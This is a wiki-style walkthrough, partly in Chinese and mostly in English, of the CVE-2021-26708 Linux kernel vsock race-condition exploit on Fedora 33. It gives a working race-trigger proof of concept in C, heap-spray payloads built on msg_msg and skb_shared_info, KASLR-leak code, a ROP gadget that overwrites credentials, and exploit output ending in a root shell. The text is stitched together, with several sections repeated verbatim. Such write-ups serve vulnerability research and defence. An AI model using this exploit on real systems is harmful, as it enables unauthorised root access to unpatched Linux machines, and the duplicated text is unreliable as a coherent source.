在第二個connect()之後馬上調用msgsnd();msg_msg被放置在virtio_vsock_sock的位置,實現破壞;
現在被破壞的msg_msg的security指針存儲原始msg_msg的地址(來自步驟2);

在這種情況下,msgsnd()返回-1,損壞的msg_msg被銷毀;釋放msg_msg.security可以釋放原始msg_msg;
用一個可控的payload 覆蓋原始msg_msg:
msgsnd()失敗後,漏洞就會調用pthread_barrier_wait(),調用127個用於堆噴射的pthreads;
這些pthreads執行setxattr()的payload;
原始msg_msg被可控的數據覆蓋,msg_msg.next指針存儲vsock_sock對象的地址;

ret = msgrcv(msg_locations[0].msq_id, kmem, ARB_READ_SZ, 0,
IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
1.專用的塊緩存,如PINGv6和sock_inode_cache有很多指向對象的指針
2.struct mem_cgroup *sk_memcg指針在vsock_sock.sk偏移量664處。 mem_cgroup結構是在kmalloc-4k塊緩存中分配的。
3.const struct cred *owner指針在vsock_sock.sk偏移量840處,存儲了可以覆蓋進行權限升級的憑證的地址。
4.void (*sk_write_space)(struct sock *)函數指針在vsock_sock.sk偏移量688處,被設置為sock_def_write_space()內核函數的地址。它可以用來計算KASLR偏移量。
#define SK_MEMCG_RD_LOCATION (DATALEN_MSG + SK_MEMCG_OFFSET)
#define OWNER_CRED_OFFSET 840
#define OWNER_CRED_RD_LOCATION (DATALEN_MSG + OWNER_CRED_OFFSET)
#define SK_WRITE_SPACE_OFFSET 688
#define SK_WRITE_SPACE_RD_LOCATION (DATALEN_MSG + SK_WRITE_SPACE_OFFSET)
/*
* From Linux kernel 5.10.11-200.fc33.x86_64:
* function pointer for calculating KASLR secret
*/
#define SOCK_DEF_WRITE_SPACE 0xffffffff819851b0lu
unsigned long sk_memcg = 0;
unsigned long owner_cred = 0;
unsigned long sock_def_write_space = 0;
unsigned long kaslr_offset = 0;
/* ... */
sk_memcg = kmem[SK_MEMCG_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sk_memcg %lx (offset %ld in the leaked kmem)\n",
sk_memcg, SK_MEMCG_RD_LOCATION);
owner_cred = kmem[OWNER_CRED_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found owner cred %lx (offset %ld in the leaked kmem)\n",
owner_cred, OWNER_CRED_RD_LOCATION);
sock_def_write_space = kmem[SK_WRITE_SPACE_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sock_def_write_space %lx (offset %ld in the leaked kmem)\n",
sock_def_write_space, SK_WRITE_SPACE_RD_LOCATION);
kaslr_offset = sock_def_write_space - SOCK_DEF_WRITE_SPACE;
printf("[+] Calculated kaslr offset: %lx\n", kaslr_offset);
#define SKB_SIZE 4096
#define SKB_SHINFO_OFFSET 3776
#define MY_UINFO_OFFSET 256
#define SKBTX_DEV_ZEROCOPY (1 << 3)
void prepare_xattr_vs_skb_spray(void)
{
struct skb_shared_info *info = NULL;
xattr_addr = spray_data + PAGE_SIZE * 4 - SKB_SIZE + 4;
/* Don't touch the second part to avoid breaking page fault delivery */
memset(spray_data, 0x0, PAGE_SIZE * 4);
info = (struct skb_shared_info *)(xattr_addr + SKB_SHINFO_OFFSET);
info->tx_flags = SKBTX_DEV_ZEROCOPY;
info->destructor_arg = uaf_write_value + MY_UINFO_OFFSET;
uinfo_p = (struct ubuf_info *)(xattr_addr + MY_UINFO_OFFSET);

/*
* A single ROP gadget for arbitrary write:
* mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret
* Here rdi stores uinfo_p address, rcx is 0, rsi is 1
*/
uinfo_p->callback = ARBITRARY_WRITE_GADGET + kaslr_offset;
uinfo_p->desc = owner_cred + CRED_EUID_EGID_OFFSET; /* value for "qword ptr [rdi + 8]" */
uinfo_p->desc = uinfo_p->desc - 1; /* rsi value 1 should not get into euid */
[a13x@localhost ~]$ ./vsock_pwn
=================================================
==== CVE-2021-26708 PoC exploit by a13xp0p0v ====
=================================================
[+] begin as: uid=1000, euid=1000
[+] we have 2 CPUs for racing
[+] getting ready...
[+] remove old files for ftok()
[+] spray_data at 0x7f0d9111d000
[+] userfaultfd #1 is configured: start 0x7f0d91121000, len 0x1000
[+] fault_handler for uffd 38 is ready
[+] stage I: collect good msg_msg locations
[+] go racing, show wins:
save msg_msg ffff9125c25a4d00 in msq 11 in slot 0
save msg_msg ffff9125c25a4640 in msq 12 in slot 1
save msg_msg ffff9125c25a4780 in msq 22 in slot 2
save msg_msg ffff9125c3668a40 in msq 78 in slot 3
[+] stage II: arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4d00
kaddr for arb read: ffff9125c2035300
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c2035300 at 0x7f0d91120ff8
[+] go racing, show wins:
[+] stage III: arbitrary read vsock via good overwritten msg_msg (msq 11)
[+] msgrcv returned 6096 bytes
[+] Found sk_memcg ffff9125c42f9000 (offset 4712 in the leaked kmem)
[+] Found owner cred ffff9125c3fd6e40 (offset 4888 in the leaked kmem)
[+] Found sock_def_write_space ffffffffab9851b0 (offset 4736 in the leaked kmem)
[+] Calculated kaslr offset: 2a000000
[+] stage IV: search sprayed skb near sk_memcg...
[+] checking possible skb location: ffff9125c42fa000
[+] stage IV part I: repeat arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4640
kaddr for arb read: ffff9125c42fa030
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c42fa030 at 0x7f0d91120ff8
[+] go racing, show wins: 0 0 20 15 42 11
[+] stage IV part II: arbitrary read skb via good overwritten msg_msg (msq 12)
[+] msgrcv returned 6096 bytes
[+] found a real skb
[+] stage V: try to do UAF on skb at ffff9125c42fa000
[+] skb payload:
start at 0x7f0d91120004
skb_shared_info at 0x7f0d91120ec4
tx_flags 0x8
destructor_arg 0xffff9125c42fa100
callback 0xffffffffab64f6d4
desc 0xffff9125c3fd6e53
[+] go racing, show wins: 15
[+] stage VI: repeat UAF on skb at ffff9125c42fa000
[+] go racing, show wins: 0 12 13 15 3 12 4 16 17 18 9 47 5 12 13 9 13 19 9 10 13 15 12 13 15 17 30
[+] finish as: uid=0, euid=0
[+] starting the root shell...
uid=0(root) gid=0(root) groups=0(root),1000(a13x) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
==Vulnerability==
These vulnerabilities are race conditions caused by incorrect locking in net/vmw_vsock/af_vsock.c. These conditional competitions were implicitly introduced in the submission that added VSOCK multi-transport support in November 2019, and were merged into the Linux kernel 5.5-rc1 version.
CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS are provided as kernel modules in all major GNU/Linux distributions. When you create a socket for the AF_VSOCK domain, these vulnerable modules are automatically loaded.
vsock = socket(AF_VSOCK, SOCK_STREAM, 0);
The creation of AF_VSOCK sockets is available to non-privileged users and does not require user name space.
==Memory corruption==
The following is a detailed introduction to the use of CVE-2021-26708, using the conditional competition in vsock_stream_etssockopt(). Two threads are required to reproduce. The first thread calls setsockopt() :
setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
&size, sizeof(unsigned long));
The second thread changes the virtual socket transmission when vsock_stream_etssockopt() tries to acquire the socket lock, by reconnecting the virtual socket:
struct sockaddr_vm addr = {
.svm_family = AF_VSOCK,
};
addr.svm_cid = VMADDR_CID_LOCAL;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
addr.svm_cid = VMADDR_CID_HYPERVISOR;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
In order to process the connect() of the virtual socket, the kernel executes vsock_stream_connect() which calls vsock_assign_transport(). This function contains the following code:
if (vsk->transport) {
if (vsk->transport == new_transport)
return 0;
/* transport->release() must be called with sock lock acquired.
* This path can only be taken during vsock_stream_connect(),
* where we have already held the sock lock.
* In the other cases, this function is called on a new socket
* which is not assigned to any transport.
*/
vsk->transport->release(vsk);
vsock_deassign_transport(vsk);
}
vsock_stream_connect() contains a socket lock, and vsock_stream_setsockopt() in the parallel thread also tries to obtain it, which constitutes a conditional competition. Therefore, when the second connect() is performed with a different svm_cid, the vsock_deassign_transport() function is called. This function executes virtio_transport_destruct(), releases vsock_sock.trans, and vsk->transport is set to NULL. When vsock_stream_connect() releases the socket lock, vsock_stream_setsockopt() can continue to execute. It calls vsock_update_buffer_size(), and then calls transport->notify_buffer_size(). Here transport contains an outdated value from a local variable, which does not match vsk->transport (the original value is set to NULL).
When the kernel executes virtio_transport_notify_buffer_size(), memory corruption occurs:
void virtio_transport_notify_buffer_size(struct vsock_sock *vsk, u64 *val)
{
struct virtio_vsock_sock *vvs = vsk->trans;
if (*val > VIRTIO_VSOCK_MAX_BUF_SIZE)
*val = VIRTIO_VSOCK_MAX_BUF_SIZE;
vvs->buf_alloc = *val;
virtio_transport_send_credit_update(vsk, VIRTIO_VSOCK_TYPE_STREAM, NULL);
}
Here, vvs is a pointer to the kernel memory, which has been released in virtio_transport_destruct(). The size of struct virtio_vsock_sock is 64 bytes and is located in the kmalloc-64 block cache. The buf_alloc field type is u32 and is located at offset 40. VIRTIO_VSOCK_MAX_BUF_SIZE is 0xFFFFFFFFUL. The value of *val is controlled by the attacker, and its four least important bytes are written into the freed memory.
==Fuzzing==
The syzkaller fuzzer has no way to reproduce this crash, so I decided to study it myself. But why does the fuzzer fail? Observe vsock_update_buffer_size() and find out:
if (val != vsk->buffer_size &&
transport && transport->notify_buffer_size)
transport->notify_buffer_size(vsk, &val);
vsk->buffer_size = val;
Only when val is different from the current buffer_size, will notify_buffer_size() be called, that is to say, when setsockopt() executes SO_VM_SOCKETS_BUFFER_SIZE, every time The size parameters of the call should all be different. So I built the relevant code:
/* * AF_VSOCK vulnerability trigger. * It's a PoC just for fun. * Author: Alexander Popov. */ #include #include #include #include #include #include #define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0) #define MAX_RACE_LAG_USEC 50 int vsock = -1; int tfail = 0; pthread_barrier_t barrier; int thread_sync(long lag_nsec) { int ret = -1; struct timespec ts0; struct timespec ts; long delta_nsec = 0; ret = pthread_barrier_wait(&barrier); if (ret != 0 && ret != PTHREAD_BARRIER_SERIAL_THREAD) { perror("[-] pthread_barrier_wait"); return EXIT_FAILURE; } ret = clock_gettime(CLOCK_MONOTONIC, &ts0); if (ret != 0) { perror("[-] clock_gettime"); return EXIT_FAILURE; } while (delta_nsec < lag_nsec) { ret = clock_gettime(CLOCK_MONOTONIC, &ts); if (ret != 0) { perror("[-] clock_gettime"); return EXIT_FAILURE; } delta_nsec = (ts.tv_sec - ts0.tv_sec) * 1000000000 + ts.tv_nsec - ts0.tv_nsec; } return EXIT_SUCCESS; } void *th_connect(void *arg) { int ret = -1; long lag_nsec = *((long *)arg) * 1000; struct sockaddr_vm addr = { .svm_family = AF_VSOCK, }; ret = thread_sync(lag_nsec); if (ret != EXIT_SUCCESS) { tfail++; return NULL; } addr.svm_cid = VMADDR_CID_LOCAL; connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm)); addr.svm_cid = VMADDR_CID_HYPERVISOR; connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm)); return NULL; } void *th_setsockopt(void *arg) { int ret = -1; long lag_nsec = *((long *)arg) * 1000; struct timespec tp; unsigned long size = 0; ret = thread_sync(lag_nsec); if (ret != EXIT_SUCCESS) { tfail++; return NULL; } clock_gettime(CLOCK_MONOTONIC, &tp); size = tp.tv_nsec; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE, &size, sizeof(unsigned long)); return NULL; } int main(void) { int ret = -1; unsigned long size = 0; long loop = 0; pthread_t th[2] = { 0 }; vsock = socket(AF_VSOCK, SOCK_STREAM, 0); if (vsock == -1) err_exit("[-] open vsock"); printf("[+] AF_VSOCK socket is opened\n"); size = 1; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE, &size, sizeof(unsigned long)); size = 0xfffffffffffffffdlu; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE, &size, sizeof(unsigned long)); ret = pthread_barrier_init(&barrier, NULL, 2); if (ret != 0) err_exit("[-] pthread_barrier_init"); for (loop = 0; loop < 30000; loop++) { long tmo1 = 0; long tmo2 = loop % MAX_RACE_LAG_USEC; printf("race loop %ld: tmo1 %ld, tmo2 %ld\n", loop, tmo1, tmo2); ret = pthread_create(&th[0], NULL, th_connect, &tmo1); if (ret != 0) err_exit("[-] pthread_create #0"); ret = pthread_create(&th[1], NULL, th_setsockopt, &tmo2); if (ret != 0) err_exit("[-] pthread_create #1"); ret = pthread_join(th[0], NULL); if (ret != 0) err_exit("[-] pthread_join #0"); ret = pthread_join(th[1], NULL); if (ret != 0) err_exit("[-] pthread_join #1"); if (tfail) { printf("[-] some thread got troubles\n"); exit(EXIT_FAILURE); } } ret = close(vsock); if (ret) perror("[-] close"); printf("[+] now see your warnings in the kernel log\n"); return 0; }
The size value here is taken from the number of nanoseconds returned by clock_gettime(), which may be different each time. The original syzkaller will not do this, because when syzkaller generates fuzzing input, the value of the syscall parameter is determined and will not change during execution.
== The power of four bytes ==
Here I choose Fedora 33 Server as the research target, the kernel version is 5.10.11-200.fc33.x86_64, and I am determined to bypass SMEP and SMAP.
In the first step, I started to study stable heap spraying, which exploited the execution of user space activities to cause the kernel to allocate another 64-byte object at the location of the released virtio_vsock_sock. After several experimental attempts, it was confirmed that the released virtio_vsock_sock was overwritten, indicating that heap spraying is feasible. Finally I found msgsnd() syscall. It creates struct msg_msg in the kernel space, see pahole output:
struct msg_msg {
struct list_head m_list; /* 0 16 */
long int m_type; /* 16 8 */
size_t m_ts; /* 24 8 */
struct msg_msgseg * next; /* 32 8 */
void * security; /* 40 8 */
/* size: 48, cachelines: 1, members: 5 */
/* last cacheline: 48 bytes */
};
The front is the message header, and the back is the message data. If the struct msgbuf in the user space has a 16-byte mtext, the corresponding msg_msg will be created in the kmalloc-64 block cache. A 4-byte write-after-free will destroy the void *security pointer at offset 40. The msg_msg.security field points to the kernel data allocated by lsm_msg_msg_alloc(). When msg_msg is received, it will be released by security_msg_msg_free(). Therefore, by destroying the first half of the security pointer, arbitrary free can be obtained.
==Kernel Information Leak==
Here is used [https://www.pwnwiki.org/index.php?title=CVE-2019-18683_Linux_kernel_through_5.3.8_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D %87%E6%BC%8F%E6%B4%9E CVE-2019-18683] the same technique. The second connect() of the virtual socket calls vsock_deassign_transport() and sets vsk->transport to NULL, making vsock_stream_setsockopt() Calling virtio_transport_send_pkt_info() after the memory crash, a kernel warning appears:
WARNING: CPU: 1 PID: 6739 at net/vmw_vsock/virtio_transport_common.c:34 ... CPU: 1 PID: 6739 Comm: racer Tainted: G W 5.10.11-200.fc33.x86_64 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014 RIP: 0010:virtio_transport_send_pkt_info+0x14d/0x180 [vmw_vsock_virtio_transport_common] ... RSP: 0018:ffffc90000d07e10 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff888103416ac0 RCX: ffff88811e845b80 RDX: 00000000ffffffff RSI: ffffc90000d07e58 RDI: ffff888103416ac0 RBP: 0000000000000000 R08: 00000000052008af R09: 0000000000000000 R10: 0000000000000126 R11: 0000000000000000 R12: 0000000000000008 R13: ffffc90000d07e58 R14: 0000000000000000 R15: ffff888103416ac0 FS: 00007f2f123d5640(0000) GS:ffff88817bd00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f81ffc2a000 CR3: 000000011db96004 CR4: 0000000000370ee0 Call Trace: virtio_transport_notify_buffer_size+0x60/0x70 [vmw_vsock_virtio_transport_common] vsock_update_buffer_size+0x5f/0x70 [vsock] vsock_stream_setsockopt+0x128/0x270 [vsock] ...
Through gdb debugging, it is found that the RCX register contains the kernel address of the released virtio_vsock_sock, and the RBX register contains the kernel address of vsock_sock.
==Achieve arbitrary reading==
===From arbitrary free to use-after-free===
Release an object from the leaked kernel address
Perform heap spray and cover the object with controlled data
Use damaged objects for privilege escalation
The System V message implemented by the kernel has a maximum limit of DATALEN_MSG, that is, PAGE_SIZE minus sizeof(struct msg_msg)). If you send a larger message, the remaining messages will be saved in the list of message segments. The msg_msg contains struct msg_msgseg *next to point to the first segment, and size_t m_ts is used to store the size. When performing an overwrite operation, you can put the controlled value in msg_msg.m_ts and msg_msg.next:

Payload:
#define PAYLOAD_SZ 40
void adapt_xattr_vs_sysv_msg_spray(unsigned long kaddr)
{
struct msg_msg *msg_ptr;
xattr_addr = spray_data + PAGE_SIZE * 4 - PAYLOAD_SZ;
/* Don't touch the second part to avoid breaking page fault delivery */
memset(spray_data, 0xa5, PAGE_SIZE * 4);
printf("[+] adapt the msg_msg spraying payload:\n");
msg_ptr = (struct msg_msg *)xattr_addr;
msg_ptr->m_type = 0x1337;
msg_ptr->m_ts = ARB_READ_SZ;
msg_ptr->next = (struct msg_msgseg *)kaddr; /* set the segment ptr for arbitrary read */
printf("\tmsg_ptr %p\n\tm_type %lx at %p\n\tm_ts %zu at %p\n\tmsgseg next %p at %p\n",
msg_ptr,
msg_ptr->m_type, &(msg_ptr->m_type),
msg_ptr->m_ts, &(msg_ptr->m_ts),
msg_ptr->next, &(msg_ptr->next));
}
But how to use msg_msg to read kernel data? By reading the msgrcv() system call documentation, I found a good solution, using msgrcv() and MSG flags:
MSG_COPY (since Linux 3.8)
Nondestructively fetch a copy of the message at the ordinal position in the queue
specified by msgtyp (messages are considered to be numbered starting at 0).
This flag causes the kernel to copy the message data to the user space without deleting it from the message queue. If the kernel has CONFIG_CHECKPOINT_RESTORE=y, then MSG is available and applicable in Fedora Server.
===Steps of arbitrary reading===
Ready to work:
Use sched_getaffinity() and CPU_COUNT() to calculate the number of available CPUs (at least two are required for this vulnerability);
Open /dev/kmsg for analysis;
mmap() configures userfaultfd() in the spray_data memory area as the last part;
Start a separate pthread to handle userfaultfd() events;
Start 127 threads for setxattr()&userfaultfd() heap spray on msg_msg, and hang them on thread_barrier;
Get the kernel address of the original msg_msg:
Conditional competition on virtual sockets;
After the second connect(), wait 35 microseconds in the busy loop;
Call msgsnd() to create a separate message queue; after memory corruption, the msg_msg object is placed in the virtio_vsock_sock position;
Parse the kernel log and save the kernel address of msg_msg from the kernel warning (RCX register);
At the same time, save the kernel address of vsock_sock from the RBX register;
Use the damaged msg_msg to perform arbitrary release of the original msg_msg:
Use 4 bytes of the original msg_msg address as SO_VM_SOCKETS_BUFFER_SIZE to achieve memory corruption;
Conditional competition on virtual sockets;
Call msgsnd() immediately after the second connect(); msg_msg is placed in the position of virtio_vsock_sock to achieve destruction;
The security pointer of the now destroyed msg_msg stores the address of the original msg_msg (from step 2);

If the msg_msg.security memory corruption from the setsockopt() thread occurs during the processing of msgsnd(), the SELinux permission check fails;
In this case, msgsnd() returns -1, and the damaged msg_msg is destroyed; releasing msg_msg.security can release the original msg_msg;
Overwrite the original msg_msg with a controllable payload:
After msgsnd() fails, the vulnerability will call pthread_barrier_wait() and call 127 pthreads for heap spraying;
These pthreads execute the payload of setxattr();
The original msg_msg is overwritten by controllable data, and the msg_msg.next pointer stores the address of the vsock_sock object;

Read the contents of the vsock_sock kernel object to user space by receiving messages from the message queue storing the overwritten msg_msg:
ret = msgrcv(msg_locations[0].msq_id, kmem, ARB_READ_SZ, 0,
IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
==Find the target of attack==
Here are the points I found:
1. Dedicated block cache, such as PINGv6 and sock_inode_cache have many pointers to objects
2. The struct mem_cgroup *sk_memcg pointer is at offset 664 in vsock_sock.sk. The mem_cgroup structure is allocated in kmalloc-4k block cache.
3. The const struct cred *owner pointer is at offset 840 of vsock_sock.sk, and stores the address of the credential that can be overwritten for permission escalation.
4. The void (*sk_write_space)(struct sock *) function pointer is at offset 688 of vsock_sock.sk and is set to the address of the sock_def_write_space() kernel function. It can be used to calculate the KASLR offset.
Here is how the vulnerability extracts these pointers from memory:
#define SK_MEMCG_RD_LOCATION (DATALEN_MSG + SK_MEMCG_OFFSET)
#define OWNER_CRED_OFFSET 840
#define OWNER_CRED_RD_LOCATION (DATALEN_MSG + OWNER_CRED_OFFSET)
#define SK_WRITE_SPACE_OFFSET 688
#define SK_WRITE_SPACE_RD_LOCATION (DATALEN_MSG + SK_WRITE_SPACE_OFFSET)
/*
* From Linux kernel 5.10.11-200.fc33.x86_64:
* function pointer for calculating KASLR secret
*/
#define SOCK_DEF_WRITE_SPACE 0xffffffff819851b0lu
unsigned long sk_memcg = 0;
unsigned long owner_cred = 0;
unsigned long sock_def_write_space = 0;
unsigned long kaslr_offset = 0;
/* ... */
sk_memcg = kmem[SK_MEMCG_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sk_memcg %lx (offset %ld in the leaked kmem)\n",
sk_memcg, SK_MEMCG_RD_LOCATION);
owner_cred = kmem[OWNER_CRED_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found owner cred %lx (offset %ld in the leaked kmem)\n",
owner_cred, OWNER_CRED_RD_LOCATION);
sock_def_write_space = kmem[SK_WRITE_SPACE_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sock_def_write_space %lx (offset %ld in the leaked kmem)\n",
sock_def_write_space, SK_WRITE_SPACE_RD_LOCATION);
kaslr_offset = sock_def_write_space - SOCK_DEF_WRITE_SPACE;
printf("[+] Calculated kaslr offset: %lx\n", kaslr_offset);
==Implement Use-after-free on sk_buff==
The network-related buffer in the Linux kernel is represented by struct sk_buff. There are skb_shared_info and destructor_arg in this object, which can be used for control flow hijacking. Network data and skb_shared_info are placed in the same kernel memory block pointed to by sk_buff.head. Therefore, creating a 2800-byte network packet in user space will cause skb_shared_info to be allocated to the kmalloc-4k block cache, as is the mem_cgroup object.
I built the following steps:
1. Use sockets (AF_INET, SOCK_DGRAM, IPPROTO_UDP) to create a client socket and 32 server sockets
2. Prepare a 2800-byte buffer in user space and use 0x42 to memset()
3. Use sendto() to send this buffer from the client socket to each server socket, which is used to create the sk_buff object in kmalloc-4k. Use `sched_setaffinity() on every available CPU
4. Perform arbitrary reading process on vsock_sock
5. Calculate the possible sk_buff kernel address as sk_memcg plus 4096 (the next element of kmalloc-4k)
6. Perform arbitrary reads on this possible sk_buff address
7. If you find 0x42424242424242lu in the location of the network data, find the real sk_buff, and go to step 8. Otherwise, add 4096 to the possible sk_buff address and go to step 6
8. Execute the setxattr()&userfaultfd() heap spray of 32 pthreads on sk_buff and hang them on pthread_barrier
9. Arbitrarily release the sk_buff kernel address
10. Call pthread_barrier_wait(), execute 32 setxattr() to cover the heap spray pthreads of skb_shared_info
11. Use recv() to receive network messages from the server socket.
==Writing freely through skb_shared_info==
The following is a valid payload that overwrites the sk_buff object:
#define SKB_SIZE 4096
#define SKB_SHINFO_OFFSET 3776
#define MY_UINFO_OFFSET 256
#define SKBTX_DEV_ZEROCOPY (1 << 3)
void prepare_xattr_vs_skb_spray(void)
{
struct skb_shared_info *info = NULL;
xattr_addr = spray_data + PAGE_SIZE * 4 - SKB_SIZE + 4;
/* Don't touch the second part to avoid breaking page fault delivery */
memset(spray_data, 0x0, PAGE_SIZE * 4);
info = (struct skb_shared_info *)(xattr_addr + SKB_SHINFO_OFFSET);
info->tx_flags = SKBTX_DEV_ZEROCOPY;
info->destructor_arg = uaf_write_value + MY_UINFO_OFFSET;
uinfo_p = (struct ubuf_info *)(xattr_addr + MY_UINFO_OFFSET);
skb_shared_info resides in the injection data, exactly at the offset SKB_SHINFO_OFFSET, which is 3776 bytes. The skb_shared_info.destructor_arg pointer stores the address of struct ubuf_info. Because the kernel address of the attacked sk_buff is known, a fake ubuf_info can be created at MY_UINFO_OFFSET in the network buffer. The following is the layout of a valid payload:

Let's talk about the destructor_arg callback:
/*
* A single ROP gadget for arbitrary write:
* mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret
* Here rdi stores uinfo_p address, rcx is 0, rsi is 1
*/
uinfo_p->callback = ARBITRARY_WRITE_GADGET + kaslr_offset;
uinfo_p->desc = owner_cred + CRED_EUID_EGID_OFFSET; /* value for "qword ptr [rdi + 8]" */
uinfo_p->desc = uinfo_p->desc - 1; /* rsi value 1 should not get into euid */
Since I couldn't find a gadget that can meet my needs in vmlinuz-5.10.11-200.fc33.x86_64, I researched and constructed it myself.
The callback function pointer stores the address of a ROP gadget, RDI stores the first parameter of the callback function, which is the address of ubuf_info itself, and RDI + 8 points to ubuf_info.desc. gadget moves ubuf_info.desc to RDX. Now RDX contains the effective user ID and group ID address minus one byte. This byte is very important: when the gadget writes message 1 from RSI to the memory pointed to by RDX, the effective uid and gid will be overwritten with zero. Repeat the same process until the privileges are upgraded to root. The output flow of the whole process is as follows:
[a13x@localhost ~]$ ./vsock_pwn
=================================================
==== CVE-2021-26708 PoC exploit by a13xp0p0v ====
=================================================
[+] begin as: uid=1000, euid=1000
[+] we have 2 CPUs for racing
[+] getting ready...
[+] remove old files for ftok()
[+] spray_data at 0x7f0d9111d000
[+] userfaultfd #1 is configured: start 0x7f0d91121000, len 0x1000
[+] fault_handler for uffd 38 is ready
[+] stage I: collect good msg_msg locations
[+] go racing, show wins:
save msg_msg ffff9125c25a4d00 in msq 11 in slot 0
save msg_msg ffff9125c25a4640 in msq 12 in slot 1
save msg_msg ffff9125c25a4780 in msq 22 in slot 2
save msg_msg ffff9125c3668a40 in msq 78 in slot 3
[+] stage II: arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4d00
kaddr for arb read: ffff9125c2035300
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c2035300 at 0x7f0d91120ff8
[+] go racing, show wins:
[+] stage III: arbitrary read vsock via good overwritten msg_msg (msq 11)
[+] msgrcv returned 6096 bytes
[+] Found sk_memcg ffff9125c42f9000 (offset 4712 in the leaked kmem)
[+] Found owner cred ffff9125c3fd6e40 (offset 4888 in the leaked kmem)
[+] Found sock_def_write_space ffffffffab9851b0 (offset 4736 in the leaked kmem)
[+] Calculated kaslr offset: 2a000000
[+] stage IV: search sprayed skb near sk_memcg...
[+] checking possible skb location: ffff9125c42fa000
[+] stage IV part I: repeat arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4640
kaddr for arb read: ffff9125c42fa030
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c42fa030 at 0x7f0d91120ff8
[+] go racing, show wins: 0 0 20 15 42 11
[+] stage IV part II: arbitrary read skb via good overwritten msg_msg (msq 12)
[+] msgrcv returned 6096 bytes
[+] found a real skb
[+] stage V: try to do UAF on skb at ffff9125c42fa000
[+] skb payload:
start at 0x7f0d91120004
skb_shared_info at 0x7f0d91120ec4
tx_flags 0x8
destructor_arg 0xffff9125c42fa100
callback 0xffffffffab64f6d4
desc 0xffff9125c3fd6e53
[+] go racing, show wins: 15
[+] stage VI: repeat UAF on skb at ffff9125c42fa000
[+] go racing, show wins: 0 12 13 15 3 12 4 16 17 18 9 47 5 12 13 9 13 19 9 10 13 15 12 13 15 17 30
[+] finish as: uid=0, euid=0
[+] starting the root shell...
uid=0(root) gid=0(root) groups=0(root),1000(a13x) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
==Video==
==Reference==
https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
==Vulnerability==
These vulnerabilities are race conditions caused by incorrect locking in net/vmw_vsock/af_vsock.c. These conditional competitions were implicitly introduced in the submission that added VSOCK multi-transport support in November 2019, and were merged into the Linux kernel 5.5-rc1 version.
CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS are provided as kernel modules in all major GNU/Linux distributions. When you create a socket for the AF_VSOCK domain, these vulnerable modules are automatically loaded.
vsock = socket(AF_VSOCK, SOCK_STREAM, 0);
The creation of AF_VSOCK sockets is available to non-privileged users and does not require user name space.
==Memory corruption==
The following is a detailed introduction to the use of CVE-2021-26708, using the conditional competition in vsock_stream_etssockopt(). Two threads are required to reproduce. The first thread calls setsockopt() :
setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
&size, sizeof(unsigned long));
The second thread changes the virtual socket transmission when vsock_stream_etssockopt() tries to acquire the socket lock, by reconnecting the virtual socket:
struct sockaddr_vm addr = {
.svm_family = AF_VSOCK,
};
addr.svm_cid = VMADDR_CID_LOCAL;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
addr.svm_cid = VMADDR_CID_HYPERVISOR;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
In order to process the connect() of the virtual socket, the kernel executes vsock_stream_connect() which calls vsock_assign_transport(). This function contains the following code:
if (vsk->transport) {
if (vsk->transport == new_transport)
return 0;
/* transport->release() must be called with sock lock acquired.
* This path can only be taken during vsock_stream_connect(),
* where we have already held the sock lock.
* In the other cases, this function is called on a new socket
* which is not assigned to any transport.
*/
vsk->transport->release(vsk);
vsock_deassign_transport(vsk);
}
